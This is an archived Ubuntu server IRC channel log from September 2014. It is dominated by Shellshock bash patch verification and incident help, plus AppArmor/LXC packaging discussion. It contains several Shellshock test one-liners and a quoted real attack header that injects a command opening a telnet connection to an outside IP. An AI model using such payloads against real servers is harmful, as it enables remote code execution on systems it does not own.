/srv/irclogs.ubuntu.com/2014/09/26/#ubuntu-server.txt

=== dmsimard_away is now known as dmsimard
=== arosales_ is now known as arosales
=== dmsimard is now known as dmsimard_away
mdevany word when a working shellshock patch will be released/01:03
mdevother distros apparently have a working one01:04
sarnoldmdev: 12.04 LTS should be fine; 14.04 is under investigation now, no ETA01:04
mdevweird they'd fix ancient version first, but ok thanks01:05
sarnoldmdev: to be honest we thought we fixed them all at the same time :/01:05
ajmitch_sarnold: fwiw, looking at the build log, bison wasn't being called to process parse.y for 4.301:05
sarnoldmdeslaur: ^^^01:06
ajmitch_probably didn't help that the build system changed a bit between versions01:06
mdevyeah I installed the first patch, still vulnerable to01:06
mdev env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo01:06
mdevcreates file echo, so yeah01:06
=== dmsimard_away is now known as dmsimard
=== dmsimard is now known as dmsimard_away
=== arrrghhh is now known as arrrghhhAWAY
=== markthomas is now known as markthomas|away
mdevseems like new patch works02:10
mdevis this accurate?02:10
mdeslaurmdev: which one?02:13
mdevdpkg -s bash | grep Version02:13
mdevVersion: 4.3-7ubuntu1.302:13
mdeslauryep, that should be the fixed version02:14
mdevhttp://askubuntu.com/a/52846602:14
mdevused security repo02:14
mdevgreat thanks02:14
mdeslaurI just pushed it out as a security update, the USN will be published in a couple of minutes02:14
mdevnice work mdeslaur02:19
mdevyou helping ton of people/companies, seen guy in #bash earlier freaking out he was going to get fired because no working patch and he told his boss it was fixed02:19
mdevso now he should be good, pretty sure he used ubuntu02:19
mdevnevermind but still! thanks02:20
mdeslauryou're welcome :P02:20
zzxcAlright so I'm sure this is pop up all over the place. Is there a way to test for the shellshock bug?03:04
=== markthomas|away is now known as markthomas
lordievaderGood morning.06:55
lkthomashey guys07:01
lkthomascan I use MAAS to provision workstation ?07:02
sarnoldlkthomas: you may want to check in #maas for details; I have an idea that it'd be alright for workstations that you don't mind spending a few minutes to reclaim and provision each time..07:05
lkthomassarnold: mind to move this topic to #maas ?07:08
=== Lcawte|Away is now known as Lcawte
Nettoehow do u test bash security with the new exploitation?07:32
sarnoldnettoe: we've been using:  env -i X='() { (a)=>\' bash -c 'echo date'; cat echo ; rm echo07:33
Nettoeand should it show?07:34
Nettoeoutput?07:34
sarnoldif it's still broken you'll get the date in a file named 'echo' -- if it is fixed, there won't be any date output and there won't be an 'echo' file07:35
Nettoesarnold: I get "echo date: command not found"07:36
sarnoldNettoe: that's unexpected :)07:36
sarnoldNettoe: here's output after installing the fix: http://paste.ubuntu.com/8431074/07:36
Nettoesarnold: or sorry, I got bash: X: line 1: syntax error near unexpected token `='07:37
Nettoesarnold: when updating bash I get an error07:53
Nettoesarnold: package is in a very bad inconsistent state07:54
sarnoldNettoe: can you pastebin the error?07:54
Nettoesarnold: http://pastebin.com/HQWw44nr07:56
Nettoesarnold: samething if I update from aptitude07:57
sarnoldNettoe: on a -guess- I think you've clouded up your environment variables with this testing07:58
sarnoldNettoe: try: sudo -i   -- then try the upgrade command in that shell07:59
Nettoewhat I do is just apt-get --reinstall install bash08:01
Nettoesarnold: what does sudo -i do?08:02
sarnoldNettoe: it clears the environment.08:02
Nettoeoh okei08:02
Nettoethank you08:02
Nettoesarnold: thanks alot man!08:04
sarnoldNettoe: fixed?08:04
Nettoesarnold: I'm greatly in your dept forever08:04
sarnoldsweet :) have fun08:04
Nettoesarnold: yes, now the bash testing shows correct=)08:04
sarnoldNettoe: nice. now bed time. :)08:05
Nettoesarnold: have a great night!=)08:05
sarnold:)08:05
abhaykadamdoing 'aptitude install apache2' says you have unmet dependencies, and then it lists bunch on depending virtual pacakages, but system is unable to install it08:24
=== a1berto_ is now known as a1berto
=== Lcawte is now known as Lcawte|Away
Thumpxrabhaykadam: try sudo apt-get -f install08:47
abhaykadam@Thumpxr, i tried it, but it didn't work08:49
abhaykadami reinstalled the server, with lamp-server selected :)08:51
ochorochGood morning ...09:13
ochorochi have installed ubuntu 14.04 on Hyper-V. It worked, but the disk shows I/O errors after some days.09:14
ochorochanyone have it running under Hyper-V?09:15
=== Lcawte|Away is now known as Lcawte
radish_hello everyone. I did patch for http://www.ubuntu.com/usn/usn-2363-1/ on about 100 systems, but on one my test still turns out vulnerable: X='() { function a a>\' bash -c echo; [ -e echo ] && echo "vulnerable"10:31
radish_can anyone confirm that after bash was patched, the command is still successfull?10:31
rbasakradish_: please confirm the package version of bash that you have on a system that still appears vulnerable.10:32
rbasakradish_: "dpkg-query -W bash"10:32
radish_rbasak: it's 4.2-2ubuntu2.3 which should be the patched version10:33
rbasakradish_: and is the shell you're testing in a new invocation of bash?10:33
cfhowlettrbasak, what *should* the bash version be?10:33
radish_rbasak: I did reboot the server to be really sure it's a new process10:34
rbasakcfhowlett: http://www.ubuntu.com/usn/usn-2363-2/10:34
cfhowlettrbasak, thanks10:34
rbasakAlso http://www.ubuntu.com/usn/usn-2363-1/10:34
radish_rbasak: weirdly enough, it's the only server acting this way out of ~65 ones with ubuntu 12.0410:34
radish_rbasak: checked the md5sum as well, it's the same one as on other systems which don't execute the exploit10:35
eNTihi. i got to ask, since its very difficult to get any definitv answer does bash 4.2ubuntu2.3 fix the bash vuln for good?10:36
eNTimaybe put in your topic, if it does? :D10:36
rbasakradish_: try md5sum (really you should be using sha256sum for security verification) on /proc/$$/exe10:36
rbasakeNTi: the latest security update versions listed in https://launchpad.net/ubuntu/+source/bash are current.10:37
rbasak(4.3-9ubuntu3  for Utopic)10:37
radish_rbasak: did compare sha256 sum as well10:37
rbasakradish_: specifically use /proc/$$/exe though, to ensure /bin/bash and not /usr/bin or /usr/local/bin or soemthin10:38
TJ-eNTi: The updates are in the topic... of #ubuntu-hardened, the security channel10:38
eNTirbasak, TJ- thx.10:38
abhishekhow can iincrease space of /opt directory10:47
catphishabhishek: is it a separate partition, lvm?10:48
SthNotTaken"() { :;}; /bin/bash -c \"telnet 197.242.148.29 9999\"" <---This is a header I was passed. My server's response was larger than it should be (156k vs. a normal 39k). What do I do now?10:48
sorenSthNotTaken: You've heard of the bash vulnerability, right?10:49
catphishSthNotTaken: why are you running " /bin/bash -c \"telnet 197.242.148.29 9999\"10:49
SthNotTakenI've just patched for it. But this happened beforehand.10:49
SthNotTakenI didnt know I was.10:50
abhishekit is not separate partition10:50
abhishekniether lvm10:50
catphishabhishek: then you just need a bigger hard disk (obviously)10:50
radish_rbasak: exe points to /bin/bash10:50
abhishekactually Ican't mount storage to this server10:51
catphishSthNotTaken: oh, someone else ran that against your server? probably best to double check you're patched, run some tests10:51
SthNotTakenI already did patch and run tests.10:51
SthNotTakenHow do I find out what happened?10:51
abhisheksry I have ample space in my SAN I can mount storage to thisserver10:52
abhisheksry catphish!10:52
sorenSthNotTaken: You probably don't. Assume the worst.10:52
SthNotTakenI'll try HTOP10:52
radish_rbasak: will try an upgrade to 14.04 and see if the problem still persists, will report back10:55
TJ-SthNotTaken: As I said in #ubuntu: SthNotTaken: Isolate it, then check logs carefully for indications of what the reverse telnet session was used for.11:09
SthNotTakenI'm checking netstat -tupan11:10
TJ-SthNotTaken: "/var/log/auth.log" should show if the attacker tried to run elevated command privileges11:10
TJ-SthNotTaken: Is telnet client installed on the sever?11:11
TJ-s/sver/server/ ?11:11
SthNotTaken... I wouldn't know how to check.11:11
SthNotTaken14.04LTS default11:11
TJ-SthNotTaken: "which telnet", "dpkg -S bin/telnet",  "apt-cache policy telnet"11:12
TJ-SthNotTaken: I don't think the 'telnet' client package is installed by default for the ubuntu-server task; it'd be a sysadmin choice to do so11:13
SthNotTakenauth.log is 16mb in 5 days :(11:14
SthNotTakenauth.log.1 is 18MB... last used 9/21/2014. auth.log is 16mb last changed 9/26/201411:15
TJ-SthNotTaken: "tasksel --task-packages server | grep telnet" => "" - so not installed by default11:15
SthNotTakennothing... but did I just install telnet?11:16
TJ-SthNotTaken: I gave you the commands to check that11:16
SthNotTakenI don't know which ones do what11:16
SthNotTakenI'm not sure what I'm looking for.11:16
SthNotTakenCan someone else help me?11:16
SthNotTaken nano /usr/bin/telnet.netkit returns a bunch of lines despite: -bash: cd: /usr/bin/telnet: Not a directory11:18
=== Lcawte is now known as Lcawte|Away
=== dmsimard_away is now known as dmsimard
radish_is there any clean method to remove desktop (gnome) and/or GUI related packages (xorg etc.) from a server? According to tasksel, no meta-package was used for installation of these so I'm not sure about how to catch all of them to remove.12:48
MadsRCYou could delete every package manually - That that sounds tedious12:52
patdk-wkhmm? doesn't removing ubuntu-desktop get most of it?12:52
patdk-wkbeen a long time since I have bothered to do that12:53
MadsRCIt does remove a bunch, but not all if I remember correctly12:53
radish_ubuntu-desktop isn't installed12:53
radish_otherwise it wouldn't be an easy task12:53
MadsRCunity-desktop? gnome-desktop ?12:53
MadsRC*-desktop12:53
patdk-wkapt-get remove .*desktop12:53
MadsRCpurge it instead12:54
patdk-wkdepends12:54
cfhowlett!pureubuntu12:54
ubottuIf you want to remove all !Kubuntu packages or !Xubuntu packages and have a default !Ubuntu system, follow the instructions here: http://www.psychocats.net/ubuntu/pureubuntu12:54
TJ-radish_: pick one of the low-level X server libraries that everything else depends on, then remove it ... everything depending on it will be removed too :)12:55
patdk-wkinstall http://i.imgur.com/BPGsKbc.jpg :)12:55
=== dmsimard is now known as dmsimard_away
=== dmsimard_away is now known as dmsimard
hallynstgraber: jdstrand needs a new lxc in utopic to accomodate a Breaks in apparmor package.  I can push an lxc with just the apparmor changes he wanted - you're not ready to push the new lxc yet right?14:13
* jdstrand can also back out the Breaks, but that would require another upload to add it back in later14:14
stgraberhallyn: I'm not completely ready, currently my best guess is Monday and that's assuming I can get a FFe, so I'd say go ahead14:16
zulhallyn:  new lxc as in ovs support?14:23
gidogeekHi, I'm having some trouble setting up postfix on one of my servers, I have (near) identical configuration between 2 servers, 1 works, other doesn't. THe one that works is Ubuntu 14.04 with Postfix 2.11 and the one that doesn't work is Ubuntu 12 with postfix 2.9.6. I can send e-mails but I can't receive them. The only difference in configuration is the domain14:25
gidogeekhttp://mxtoolbox.com reports correct DNS setting but can't connect to SMTP on the Ubuntu 12 one, but can connect on the 14.04 one14:26
gidogeekwhich leads me to suspect a firewall issue, I can however telnet to it on port 2514:26
gidogeekany other suggestions for debugging ?14:26
hallynzul: yes it should have that14:27
zulhallyn:  oh goody14:27
hallynjdstrand: ok, so I needed a Depends in lxc bc it needs the newer apparmor it breaks without it.  I guess we should have stuck with that :)  I'm still waiting for stgraber's ack on the second apparmor patch upstream.14:28
hallyntechnically the Breaks you put in wasn't equivalent I guess :)14:29
jdstrandhallyn: you shouldn't need that I don't think14:30
jdstrandhallyn: lxc never had a Depends on apparmor14:30
hallynhm, true14:31
hallynok, i'll push in a few mins14:31
jdstrandhallyn: you are probably seeing this issue because the apparmor that introduced the breaks isn't in the archive for download14:31
hallynjdstrand: seeing what?14:32
jdstrandhallyn: the breaks make it so that apparmor will be updated prior to lxc if they are updated at the same time14:32
jdstrandhallyn: I assume you saw an issue since you felt compelled to add the Depends14:32
hallynjdstrand: I didn't add a depends.  It was just how I was thinking the problem would've been fixed.  but anyway,14:34
hallynwaht's the bug# again for this stuff?14:34
jdstrandif not, just leaving the Depends in lxc as is should be fine (we do the same thing with lightdm, which also doesn't have a Depends on apparmor and it has unix rules)14:34
hallynI'm not adding a depends to lxc14:34
jdstrandok cool14:34
jdstrandbug #137355514:35
uvirtbotLaunchpad bug 1373555 in apparmor "please restrict signal, ptrace and unix mediation to the container" [Undecided,Fix committed] https://launchpad.net/bugs/137355514:35
hallynthanks14:35
jdstrandthank you! :)14:39
jdstrandhallyn: can you ping me when you upload it?14:39
hallynsure14:41
hallynjust running some new tests14:41
jdstrandcool14:42
hallynjdstrand: hm, i dunno.  does lxc also needs a Breaks on the earlier apparmor?14:42
hallynI don't see how the apparmor Breaks on older lxc can force apparmor to be updated first, if user has an older apparmor14:43
=== Lcawte|Away is now known as Lcawte
stgraberoh, not that again, we already had that discussion with the past two apparmor changes14:47
stgraberyou need to bump LXC's dependency on the new apparmor to ensure that when it's installed, the new stanzas are supported and the parser doesn't fail. And you need to have apparmor break lxc to ensure people don't update apparmor without lxc14:48
stgraberhallyn: there's a versioned dependency against apparmor in LXC, but it's a generated one, you won't find it in debian/control but in debian/rules instead14:48
stgraberit has logical for per-release minimal version14:48
stgraber*logic14:48
stgraberhallyn: I also replied to the second patch with a bunch more questions14:49
kyle__Does the ubuntu installer support the partman/early_command?  I'm not having much luck with it.14:57
hallynwho had that discussoin with the past two apparmor changes?  I think i sat those out14:58
hallynjdstrand: are you on the lxc-devel m-l by chance?  I don't want to put words into your mouth.14:59
hallynstgraber: the mysqld socket concern again seems unfounded, so long as it' sa named unix socket14:59
hallynas for ""what it buys is" I'd prefer jdstrand elaborate.15:00
hallyns/is/us/15:00
jdstrandhallyn: I am not, but I put that in the bug: "Obviously, namespaces are intended to block these accesses in and of themselves, but this add an incremental improvement and security in depth in case something goes wrong there"15:10
jdstrandgrammatical error aside...15:10
stgraberyeah, my worry here is that this is just a safety net for the case where the kernel has already gone massively wrong and that safety net appears to cause breakage for advanced use cases which may lead to people opting to either turn off apparmor for the container or for their own tool, which in either case is much worse than status quo15:13
* stgraber writes down a bunch of scenarios that appear to be made impossible by those extra (and mostly unneeded) restrictions15:14
jdstrandwhat advanced use cases are broken?15:14
jdstrandalso, do these advanced use cases require adjusting the existing policy already?15:15
stgraberwell, for one, if I'm reading parsing the new policy properly, you're breaking my CI environment. I've got C programs using the LXC API which run under their own apparmor profile (so not unconfined) and then send signals and attach to the network namespace of existing containers.15:15
jdstrandfinally, you have alternate profiles for lxc-default-with-mounting and lxc-default-with-nesting, could add an additional profile for these advanced use cases15:16
stgraberthe signal change will block the former since the peer profile won't be unconfined and won't be lxc-start and the unix change will prevent me from setns + bind to an abstract socket if the process doing that is running under apparmor15:17
jdstrandsure15:17
stgraberso to me, this seems like we're pushing the user towards not running their management tools under apparmor15:17
jdstrandso, we can have an additional profile for that15:17
jdstrandto me, the management tools under apparmor are for less interesting than the conainer under apparmor15:18
jdstrandbut, that should certainly be supported15:18
jdstrand(and it is, with either policy updates or adding an additional template)15:19
jdstrands/template/profile/15:19
stgraberso the problem of the extra profile is that all existing containers will break on upgrade15:19
stgraberwhat's the exact concern with allowing all incoming signals and all incoming unix socket connections?15:19
stgraberwe usually try to protect the host from the container, not the other way around15:20
jdstrandit isn't a concern per se, it is security in depth15:20
jdstrandtoday, it isn't going to do much because all containers run under the same profile name15:21
jdstrandbut, we should support running each container under its own profile, like how libvirt-lxc does it15:21
jdstrandwhen that happens, one container will not be able to send signals to another container15:22
jdstrand(of course, that already is happening with namespaces, but this is the security in depth I was talking about)15:22
jdstrandstgraber: so, for today, we could adjust the signal rule to be: 'signal (receive),15:23
jdstrand'15:23
stgraberjdstrand: ok, so I'll nack the current patch and comment that I'll ack it if we make it "signal (receive)," and "unix (receive),". That'll address my concerns for now.15:24
jdstrandstgraber: sure. that will limit 'send', which I think is quite worthwhile15:25
jdstrandstgraber: also, if lxc does ever support per container profiles, maybe that is when we can introduce an additional profile template-- and it would have the more strict receive rule15:26
stgraberjdstrand: so do those apply to the actual send() and recv() calls or does that only apply to bind()? because if the former, that makes the whole thing a bit pointless and then we'd have to allow both :)15:26
jdstrandstgraber: unix rules have a whole slew of options include send, receive and bind15:27
jdstrand(ie, the LSM hooks in all over the place)15:28
jdstrandhallyn: let me get you a new debdiff in the bug15:28
stgraberjdstrand: ok, so to confirm "unix (receive)," means that an outside process will be allowed to connect to any unix socket which the target (running the apparmor profile) has bound and then be able to have a regular bi-directional communication over it, but the processes running under the apparmor profile will not be able to bind to a socket which isn't running under that same profile, correct?15:30
hallynsigh, new debdiff?  guess i have to read the backlog15:31
hallynjdstrand: fwiw I was working with http://paste.ubuntu.com/8433668/15:31
hallyn(which has the one additional rule on top of yours)15:31
stgraberjdstrand: also, I hope that going forward once we get profile stacking and use apparmor namespaces, we can come up with more clever ways to protect the host based on the stack of namespaces (you can do whatever you want to your any child namespace but can't do anything to your parent kind of thing).15:32
jdstrandstgraber: we'll see what that brings. profile stacking is very high on the todo list now15:32
stgraberjdstrand: something like that would be far more generic and would actually align properly with what we want + it shouldn't matter then whether we run with the same profile for everything or if we have per-container profiles since we'd have per-container namespaces anyway15:33
jdstrandI'm also thinking about container isolation in addition to host protection (if that wasn't clear)15:33
stgraberI realize it'll still be a while before we can do that kind of advanced stuff (getting stacking to work at all is the main goal for now), but I've got hope that we can come up with a solution I'm actually fine with in $FUTURE15:33
hallynmay i suggest that (a) apparmor is a different model than selinux and (b) the apparmor camp used to espouse its advantages;  this path feels like pursuing selinux away from the apparmor model (regardless of how i feel about eithe rmodel)15:34
jdstrandprofile composition is part of the stacking work15:34
hallynbut anyway, i digress15:34
jdstrandand it offers a number of interesting options, indeed15:34
jdstrandhallyn: I don't quite follow your digression. there is more to life than just paths and we are still doing dynamic labelling15:36
jdstrand:)15:36
jdstrandwe are not pursuing the selinux model. I'm sure if you had a drink with jj he'd be happy to discuss how we are different at great length :)15:37
jdstrandbut, LSMs being what they are, we need to work together with where the hooks live15:37
jdstrandmaybe it is that every process has its labelling in selinux and that I'd like containers to each have their own apparmor labelling that is the root of this15:39
hallynno it's the fact that apparmor around 2005 talked about the advantage of just protecting the host from untrusted network daemons, while selinux wanted everything confined15:40
jdstrandheh15:40
jdstrandwell, this is 2014. things have changed15:40
jdstrand:)15:40
jdstrandwe want to have a strong sandbox for untrusted code (appstore apps)15:40
hallynstgraber: your jenkins environment with the confined helper not being able to signal into a container is a real problem.  let's focus o nthat one15:41
jdstrandand if we can't mediate access to the upstart abstract socket or those apps sending other apps signals, we kinda lost15:41
stgraberhallyn: what we discussed with jdstrand will solve that, just waiting for the new debdiff15:41
hallynjdstrand: we have that, user namespaces :)  they are *the* way to finally, safely deal with setuid-root15:41
hallynoh.  i read backlog, but missed tha tsomehow15:41
hallynsounds good15:41
hallynlxc-test-unpriv passes with my debdiff, so as fara s i'm concerned long as it's based on mine you guys can push15:42
jdstrandhallyn: I don't want to get into a containers vs apparmor thing here. there is overlap, there are applications for both and they can work together15:42
hallynjdstrand: aluto and i were actually talking about the dac.vs.mac thing in chicago...  it's deeper than one might hope15:43
stgraberjdstrand: oh, another question about that patch which I asked on the ML earlier. Exactly what are we blocking wrt ptrace? The profile contains a whitelist so it's kinda hard to know what's meant to be blocked :)15:43
hallynwe like to say dac and mac are orthogonal, but dac may not be able to subvert the mac in some cases15:43
hallynstgraber: yeah perhaps the container-base should have a commented list.  i'm not sure pointing at a wiki suffices here15:44
jdstrandstgraber: the container can't trace other processes that run under a different label than @{profile_name}15:44
stgraberjdstrand: ok, if that's the only thing which gets blocked, that's perfectly reasonable15:48
hallynjdstrand: so to be clear, you're taking the debdiff i posted above as your base?15:48
jdstrandstgraber: actually, we also disable ptrace 'read' to outside the container15:50
stgraberjdstrand: that's fine too15:51
jdstrandhallyn: I am working off my portion of that. I was thinking I'd wrap all the apparmor stuff into a single debdiff so it could be uploaded alone and the new lxc release could come after15:52
jdstrandhallyn: I could do something else, or you could take my debdiff and incorporate it15:52
hallynjdstrand: my debdiff just adds the one needed signal rule and fixes debian/rules to set the right apparmor version dep15:53
jdstrandit also modifies the upstart job15:53
jdstrandjobs*15:54
hallynmy debdiff?15:54
jdstrandlook at the paste you gave me :)15:54
hallynoh.  oops.  that's bc i made the debidff after doing a debian/rules build15:55
hallynok fine i'll just tweak yours when you're done15:55
TJ-Is Canonical, Ubuntu, or Amazon responsible for updating Ubuntu AMI images that have the affected bash versions?16:00
mdeslaurTJ-: utlemming is who you're looking for16:02
TJ-mdeslaur: Thanks; a user just asked in #ubuntu but I wasn't clear who is responsible - so it is an Ubuntu responsibility?16:03
mdeslaurTJ-: yes, canonical takes care of it, utlemming can give you the details when he gets here16:03
TJ-thresh: mdeslaur has the answer16:04
threshyep, thank you.16:04
rcjTJ-, Ubuntu updates those images.  We've have updated images for USN-2362-1/CVE-2014-6271 and are in the process of qualifying our images for CVE-2014-7169.  The archive mirrors have those package updates already of course.16:04
uvirtbotrcj: GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occ16:04
uvirtbotrcj: GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients16:04
TJ-thresh has a complete answer now :)16:05
threshyeah I guess it takes time for the images validation.16:06
threshthanks guys, appreciate it - amazon gave me time until monday to update my marketplace amis, so willing to do that sooner than later.16:07
jamespagezul, coreycb: are either of you guys looking at updating the oslo.* packages to the upstream release versions?16:16
coreycbjamespage, it's not on my list atm but I could add it16:17
jamespagezul, gah upstream went 1.4.0.0a5 -> 1.4.016:21
zuljamespage:  i was going to16:27
jamespagezul, what happened?16:27
=== uber is now known as Guest71879
zuljamespage:  i updated most of them except for oslo.messaging16:27
zuljamespage:  ill double check16:28
jamespagezul, please do - I see most out-of-date compared to the upstream juno release that doug did16:28
jamespagezul, I'm looking at messaging now16:28
zuljamespage:  ack16:28
jamespagezul, messaging 1.4.1 uploaded, looking at config now16:31
zuljamespage:  oslo.18n is in proposed16:31
jamespagezul, that and db are stuck on a keystone regression - still at b2?16:34
jamespagewtf16:34
zulyeah16:34
zuljamespage:  leave it with me go enoy your weekend16:36
jamespagezul, OK - I'll do the config I have in flight and leave the rest to you16:36
=== markthomas is now known as markthomas|away
=== markthomas|away is now known as markthomas
=== kermit1 is now known as kermit
=== not_phunyguy is now known as phunyguy
=== phuh is now known as thealphaphuh
Phibsis bash actually fixed yet ?18:52
Phibsenv ls='() { echo vulnerable; }' bash -c ls18:53
Phibsseems not18:57
Phibshttp://www.ubuntu.com/usn/usn-2363-2/18:57
Phibssays      bash 4.3-7ubuntu1.3  is fixed18:57
Phibsbut it is not18:57
sarnoldPhibs: that's an intentional feature of bash.18:59
jrwrenfixed for me.18:59
Phibsbullshit18:59
Phibslol18:59
streulmahello, amavis keeps crashing, and killed by SIGHUP19:00
Thornhello19:09
SCHAAP137good afternoon19:09
ThornI have an 11.04 server that I need to patch for shellshock, but I can't even install build-essential, seems like repos are down19:09
rww!11.0419:10
ubottuUbuntu 11.04 (Natty Narwhal) was the fourteenth release of Ubuntu. Desktop support ended on October 28, 2012. See !upgrade, !lts and !eol for more details.19:10
rww!eolupgrade19:10
ubottuEnd-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades19:10
sarnoldThorn: 11.04 hasn't had security updates for nearly two years19:10
rwwprobably best if you stick to LTS releases from now on19:10
Thornthis is a web host vps and I probably can't upgrade it without purchasing a new vps19:10
rwwokay. it still hasn't been supported for two years.19:11
Thornand I'm pretty sure they didn't offer any LTS at that time... (that's not linode)19:11
sarnoldsince 11.04's replacement has also been EOLed for a long time, upgrading that machine might take some real effort. buying a second vps for a day or two might be the cheapest and fastest way out of this.19:11
henkjanshellshock may be the least of your problems on a 11.04 vm19:12
Thornok thanks19:14
sarnoldgood luck Thorn :)19:14
patdk-wkisn't that vaunerable to heartbleed too?19:25
patdk-wkor was it still using 0.9819:25
=== lazyPower is now known as lazyPower|Spinni
The_Tickif I have a 10.10 box, what's the upgrade path to current? (14.04.1)?20:16
rww10.10 -> 11.04 -> 11.10 -> 12.04 -> 14.04.120:17
The_Tickno direct jump then? alright20:17
rwwi'd recommend a backup and reinstall, to be honest20:17
The_TickI'm really considering it20:17
The_Tickdo-release-upgrade is complaining about natty.tar.gz.gpg missing20:18
The_Tickbut I haven't checked the sources list yet20:18
rww!eolupgrade20:19
ubottuEnd-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades20:19
The_Tickthanks20:19
The_Tickoof ya this is on reiser20:21
The_Ticktime to contact the hosting company, whee20:21
The_Tickthanks rww20:21
=== thealphaphuh is now known as talves
=== markthomas is now known as markthomas|away
=== markthomas|away is now known as markthomas
SthNotTakenIs there a simple way to install JFreeChart which has Java Dependencies?22:12
=== Lcawte is now known as Lcawte|Away
=== Ursinha is now known as Ursinha-afk
=== lazyPower|Spinni is now known as lazyPower
=== Ursinha-afk is now known as Ursinha
Seannieis this the channel i can ask about the bash exploit?23:38
sarnoldSeannie: sure, here or #ubuntu-hardened23:38
Seanniedid i read things wrong but the exploit affects as far back as 10.04?23:39
Seannieis this just some smokescreen that allows the FBIs prism into what was once supposed to be a secure crowddriven o/s?23:40
sarnoldSeannie: probably all versions of ubuntu ever released; the bug was introduced roughly in 1996 or so.23:40
sarnoldSeannie: but 10.04 LTS is the oldest currently supported ubuntu, so that's as far back as we've prepared updates23:40
Seannieah23:40
Seannieis this a canonical employee's lounge? hehe23:40
sarnoldit's a good mix of people here, some employees some not :)23:41
Seannieso the bug was just a part of the way bash worked until it was discovered to allow root or other backdoor access, which was only just recently reported yesterday correct?23:42
Seanniereported AND discovered?23:42
Seannieor it always behaved that way, but now its a problem due to... something something something?23:43
sarnoldwell, the flaw doesn't itself allow root exploits; how bash was used in many network-facing daemons is what really allowed things to get out of hand23:43
sarnoldas I understand the flaw, it was discovered and reported roughly one week ago; over the weekend some patches were prepared and tested, wider annoucements were made to software vendors monday and tuesday with the intent of releasing the patches wednesday.23:45
sarnoldonce the patches were out in wider audiences on wednesday, that's when taviso found the fix developed over the weekend was insufficient23:45
sarnoldthere was discussion during the weekend about changing bash's behaviour but everyone agreed that discussion needed to happen in public since it might mean breaking existing software23:45
Seanniethe suggestion the flaw is similar to heartbleed... spin for the microserf crowd?23:46
sarnoldnothing at all like heartbleed except that it can potentially affect a great many people in a highly visible way23:47
sarnoldheartbleed allowed people to look at random tiny pieces of server or client memory, and sometimes interesting things are stored there23:47
sarnoldthese bash bugs allow executing nearly arbitrary code through a variety of services that were previously thought to be safe23:48
Seanniesuch as, say, perhaps the freenode servers which detected unusual binaries?23:48
sarnold.. but not everyone has those services configured in a way that would use bash23:48
sarnoldit's highly unlikely this bug was used for freenode compromise23:48
Seannieis there evidence in the wild this exploit was taken advantage of?23:51
sarnoldas far as I know, no evidence at all from before wednesday; after wednesday, absolutely tons. it's relatively easy to work with this one, so the barrier to entry is very low. within hours people were seeing coordinated scanning evidence in their webserver logs.23:52
Seanniebusiness as usual since 14.04 was just out, and there are many updates frequently which I expect wont settle down for some time to come, yet this exploit for bash trended on my very non computer oriented facebook news feed, which i thought odd - is the increased reporting due to the ease of the exploit or the seriousness of what it could affect? Or is the reporting more a sign that Linux is growing more prevalent?23:53
sarnoldI suspect large ease of exploitation and seriousness23:54
Seanniewhich the current patch partially addresses23:56
sarnoldthe two patches we've currently integrated address the most pressing aspects of the fault; there are other outstanding issues that we'll patch early next week, and I hope there's some wider discussion about turning off this aspect of the bash parser entirely unless requested, similar to the patches prepared by netbsd: http://www.openwall.com/lists/oss-security/2014/09/26/2223:57
Seanniedoes the bash exploit affect desktop home users?23:57
sarnoldit could, bash is used e.g. in the dhcpcd scripts, so a malicious dhcp server could cause trouble23:58
Seanniehrm. my isp uses dhcp only23:59
Seannieor no23:59
Seanniei have it backwards23:59
sarnolda home user is more likely to install a tool such as webmin or cpanel or other horrible web front-ends that provide many many opportunities for potential exploitation23:59

Generated by irclog2html.py 2.7 by Marius Gedminas - find it at mg.pov.lt!